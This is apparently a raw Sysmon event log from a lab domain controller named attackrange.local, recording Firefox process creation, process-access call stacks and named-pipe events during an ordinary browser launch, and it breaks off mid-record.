Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000105170Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.388{58E9C193-B426-615A-0B02-00000000FC01}44806928C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0C02-00000000FC01}5276C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\ADVAPI32.dll+188af|C:\Program Files\Mozilla Firefox\firefox.exe+8ba5|C:\Program Files\Mozilla Firefox\firefox.exe+57b9|C:\Program Files\Mozilla Firefox\firefox.exe+1bbb8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000105169Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.397{58E9C193-B426-615A-0C02-00000000FC01}5276C:\Program Files\Mozilla Firefox\firefox.exe92.0.1FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{58E9C193-AE65-615A-D9E8-0D0000000000}0xde8d92MediumMD5=DBDB3EFACC3D9039A4F5703662099178,SHA256=534A44A08893AFBE78E04B4CFF80BD00BFC40562A923E8AF38E240227A643FFB,IMPHASH=AECE7B7E776840D7A7255A31B309B7E4{58E9C193-B426-615A-0B02-00000000FC01}4480C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 10341000x8000000000000000105168Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.388{58E9C193-B426-615A-0B02-00000000FC01}44806928C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+7396|C:\Program Files\Mozilla Firefox\firefox.exe+57b9|C:\Program Files\Mozilla Firefox\firefox.exe+1bbb8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105167Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.370{58E9C193-ACA7-615A-1200-00000000FC01}7641144C:\Windows\System32\svchost.exe{58E9C193-B426-615A-0B02-00000000FC01}4480C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\pcasvc.dll+52e4|c:\windows\system32\pcasvc.dll+58a9|c:\windows\system32\pcasvc.dll+5b49|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105166Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.370{58E9C193-ACA7-615A-1200-00000000FC01}7641144C:\Windows\System32\svchost.exe{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\Explorer.EXE0x1440C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+5bab|c:\windows\system32\pcasvc.dll+5b07|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105165Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.370{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105164Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.370{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105163Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.370{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105162Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.370{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105161Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.370{58E9C193-AE62-615A-B200-00000000FC01}32126164C:\Windows\system32\csrss.exe{58E9C193-B426-615A-0B02-00000000FC01}4480C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000105160Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.370{58E9C193-AE68-615A-C800-00000000FC01}45485500C:\Windows\Explorer.EXE{58E9C193-B426-615A-0B02-00000000FC01}4480C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+a909f|C:\Windows\System32\windows.storage.dll+a8d15|C:\Windows\System32\windows.storage.dll+a8806|C:\Windows\System32\windows.storage.dll+a9c78|C:\Windows\System32\windows.storage.dll+a862e|C:\Windows\System32\windows.storage.dll+ab445|C:\Windows\System32\windows.storage.dll+ab7c4|C:\Windows\System32\windows.storage.dll+aae00|C:\Windows\System32\windows.storage.dll+ad62a|C:\Windows\System32\windows.storage.dll+ad3e2|C:\Windows\System32\SHELL32.dll+3f8bd|C:\Windows\System32\SHELL32.dll+3e456|C:\Windows\System32\SHELL32.dll+801d1|C:\Windows\System32\SHELL32.dll+6716e|C:\Windows\System32\windows.storage.dll+10932|C:\Windows\System32\windows.storage.dll+10629|C:\Windows\System32\windows.storage.dll+104ff|C:\Windows\System32\SHELL32.dll+80257|C:\Windows\System32\SHELL32.dll+6716e|C:\Windows\System32\SHLWAPI.dll+e1f7 154100x8000000000000000105159Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.372{58E9C193-B426-615A-0B02-00000000FC01}4480C:\Program Files\Mozilla Firefox\firefox.exe92.0.1FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" C:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{58E9C193-AE65-615A-D9E8-0D0000000000}0xde8d92HighMD5=DBDB3EFACC3D9039A4F5703662099178,SHA256=534A44A08893AFBE78E04B4CFF80BD00BFC40562A923E8AF38E240227A643FFB,IMPHASH=AECE7B7E776840D7A7255A31B309B7E4{58E9C193-AE68-615A-C800-00000000FC01}4548C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 10341000x8000000000000000105158Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.355{58E9C193-B422-615A-0602-00000000FC01}55524812C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0A02-00000000FC01}5532C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+a0b461|C:\Program Files\Mozilla Firefox\xul.dll+a6c6e5|C:\Program Files\Mozilla Firefox\xul.dll+d0281|C:\Program Files\Mozilla Firefox\xul.dll+19d6412|C:\Program Files\Mozilla Firefox\xul.dll+1747b79|C:\Program Files\Mozilla Firefox\xul.dll+167b2d9|C:\Program Files\Mozilla Firefox\xul.dll+2680a|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+8b45d7|C:\Program Files\Mozilla Firefox\nss3.dll+7647d|C:\Program Files\Mozilla Firefox\nss3.dll+8e401|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105157Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.355{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0902-00000000FC01}6624C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a12d37|C:\Program Files\Mozilla Firefox\xul.dll+a82909|C:\Program Files\Mozilla Firefox\xul.dll+9db572|C:\Program Files\Mozilla Firefox\xul.dll+8b0dba|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167af82|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d|C:\Program Files\Mozilla Firefox\firefox.exe+1bbb8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105156Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.355{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0902-00000000FC01}6624C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a12d37|C:\Program Files\Mozilla Firefox\xul.dll+a82909|C:\Program Files\Mozilla Firefox\xul.dll+9db572|C:\Program Files\Mozilla Firefox\xul.dll+8b0dba|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167af82|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d|C:\Program Files\Mozilla Firefox\firefox.exe+1bbb8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105155Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.355{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0902-00000000FC01}6624C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a12d37|C:\Program Files\Mozilla Firefox\xul.dll+a82909|C:\Program Files\Mozilla Firefox\xul.dll+9db572|C:\Program Files\Mozilla Firefox\xul.dll+8b0dba|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167af82|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d|C:\Program Files\Mozilla Firefox\firefox.exe+1bbb8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105154Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.339{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0A02-00000000FC01}5532C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a4ff28|C:\Program Files\Mozilla Firefox\xul.dll+e5acd8|C:\Program Files\Mozilla Firefox\xul.dll+2165eb|C:\Program Files\Mozilla Firefox\xul.dll+ca12c4|C:\Program Files\Mozilla Firefox\xul.dll+17035a0|C:\Program Files\Mozilla Firefox\xul.dll+16d0278|C:\Program Files\Mozilla Firefox\xul.dll+1b6aed7|C:\Program Files\Mozilla Firefox\xul.dll+17876ff|C:\Program Files\Mozilla Firefox\xul.dll+14cbf5|C:\Program Files\Mozilla Firefox\xul.dll+14cf69e|UNKNOWN(0000037E87994A10) 10341000x8000000000000000105153Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.339{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0902-00000000FC01}6624C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a4ff28|C:\Program Files\Mozilla Firefox\xul.dll+e5acd8|C:\Program Files\Mozilla Firefox\xul.dll+2165eb|C:\Program Files\Mozilla Firefox\xul.dll+ca12c4|C:\Program Files\Mozilla Firefox\xul.dll+17035a0|C:\Program Files\Mozilla Firefox\xul.dll+16d0278|C:\Program Files\Mozilla Firefox\xul.dll+1b6aed7|C:\Program Files\Mozilla Firefox\xul.dll+17876ff|C:\Program Files\Mozilla Firefox\xul.dll+14cbf5|C:\Program Files\Mozilla Firefox\xul.dll+14cf69e|UNKNOWN(0000037E87994A10) 10341000x8000000000000000105152Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.339{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0802-00000000FC01}1112C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a4ff28|C:\Program Files\Mozilla Firefox\xul.dll+e5acd8|C:\Program Files\Mozilla Firefox\xul.dll+2165eb|C:\Program Files\Mozilla Firefox\xul.dll+ca12c4|C:\Program Files\Mozilla Firefox\xul.dll+17035a0|C:\Program Files\Mozilla Firefox\xul.dll+16d0278|C:\Program Files\Mozilla Firefox\xul.dll+1b6aed7|C:\Program Files\Mozilla Firefox\xul.dll+17876ff|C:\Program Files\Mozilla Firefox\xul.dll+14cbf5|C:\Program Files\Mozilla Firefox\xul.dll+14cf69e|UNKNOWN(0000037E87994A10) 10341000x8000000000000000105151Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.339{58E9C193-ACA7-615A-1400-00000000FC01}9401608C:\Windows\system32\svchost.exe{58E9C193-B426-615A-0A02-00000000FC01}5532C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105150Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.339{58E9C193-ACA7-615A-1400-00000000FC01}9401608C:\Windows\system32\svchost.exe{58E9C193-B426-615A-0A02-00000000FC01}5532C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105149Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.339{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+b873b1|C:\Program Files\Mozilla Firefox\xul.dll+b635c3|C:\Program Files\Mozilla Firefox\xul.dll+b66218|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167af82|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d|C:\Program Files\Mozilla Firefox\firefox.exe+1bbb8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105148Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.323{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0A02-00000000FC01}5532C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a4efc8|C:\Program Files\Mozilla Firefox\xul.dll+a12d37|C:\Program Files\Mozilla Firefox\xul.dll+a5b7d9|C:\Program Files\Mozilla Firefox\xul.dll+e50238|C:\Program Files\Mozilla Firefox\xul.dll+19e1f56|C:\Program Files\Mozilla Firefox\xul.dll+19d6412|C:\Program Files\Mozilla Firefox\xul.dll+19ae344|C:\Program Files\Mozilla Firefox\xul.dll+167af82|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d|C:\Program Files\Mozilla Firefox\firefox.exe+1bbb8|C:\Windows\System32\KERNEL32.DLL+84d4 18141800x8000000000000000105147Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-ConnectPipe2021-10-04 07:58:30.323{58E9C193-B422-615A-0602-00000000FC01}5552\cubeb-pipe-5552-2C:\Program Files\Mozilla Firefox\firefox.exe 17141700x8000000000000000105146Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-CreatePipe2021-10-04 07:58:30.323{58E9C193-B422-615A-0602-00000000FC01}5552\cubeb-pipe-5552-2C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000105145Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.323{58E9C193-ACA5-615A-0B00-00000000FC01}6282264C:\Windows\system32\lsass.exe{58E9C193-B426-615A-0A02-00000000FC01}5532C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105144Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:30.323{58E9C193-ACA5-615A-0B00-00000000FC01}6282264C:\Windows\system32\lsass.exe{58E9C193-B426-615A-0A02-00000000FC01}5532C:\Program Files\Mozilla 